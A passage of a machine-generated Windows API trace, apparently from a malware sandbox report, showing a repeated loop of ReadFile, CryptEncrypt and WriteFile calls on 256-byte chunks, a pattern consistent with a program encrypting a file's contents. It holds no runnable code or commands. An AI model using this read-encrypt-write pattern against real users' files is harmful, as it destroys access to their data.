hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.280] GetLastError () returned 0x0 [0151.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.281] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.281] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.281] GetLastError () returned 0x0 [0151.281] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.281] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.281] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.281] GetLastError () returned 0x0 [0151.281] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.281] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.281] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.281] GetLastError () returned 0x0 [0151.281] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.281] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.281] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.281] GetLastError () returned 0x0 [0151.281] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.281] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.281] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.281] GetLastError () returned 0x0 [0151.281] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.281] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.281] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.281] GetLastError () returned 0x0 [0151.281] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.281] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.282] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.282] GetLastError () returned 0x0 [0151.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.282] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.282] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.282] GetLastError () returned 0x0 [0151.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.282] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.282] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.282] GetLastError () returned 0x0 [0151.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.282] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.282] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.282] GetLastError () returned 0x0 [0151.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.282] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.282] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.282] GetLastError () returned 0x0 [0151.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.282] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.282] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.282] GetLastError () returned 0x0 [0151.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.283] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.283] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.283] GetLastError () returned 0x0 [0151.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.283] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.283] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.283] GetLastError () returned 0x0 [0151.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.283] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.283] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.283] GetLastError () returned 0x0 [0151.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.283] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.283] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.283] GetLastError () returned 0x0 [0151.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.283] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.283] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.283] GetLastError () returned 0x0 [0151.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.283] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.283] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.283] GetLastError () returned 0x0 [0151.283] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.283] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.284] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.284] GetLastError () returned 0x0 [0151.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.284] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.284] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.284] GetLastError () returned 0x0 [0151.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.284] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.284] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.284] GetLastError () returned 0x0 [0151.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.284] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.284] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.284] GetLastError () returned 0x0 [0151.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.284] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.284] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.284] GetLastError () returned 0x0 [0151.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.284] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.284] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.284] GetLastError () returned 0x0 [0151.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.284] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.284] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.284] GetLastError () returned 0x0 [0151.284] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.285] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.285] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.285] GetLastError () returned 0x0 [0151.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.285] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.285] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.285] GetLastError () returned 0x0 [0151.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.285] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.285] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.285] GetLastError () returned 0x0 [0151.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.285] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.285] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.285] GetLastError () returned 0x0 [0151.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.285] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.285] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.285] GetLastError () returned 0x0 [0151.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.285] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.285] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.285] GetLastError () returned 0x0 [0151.285] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.286] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.286] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) 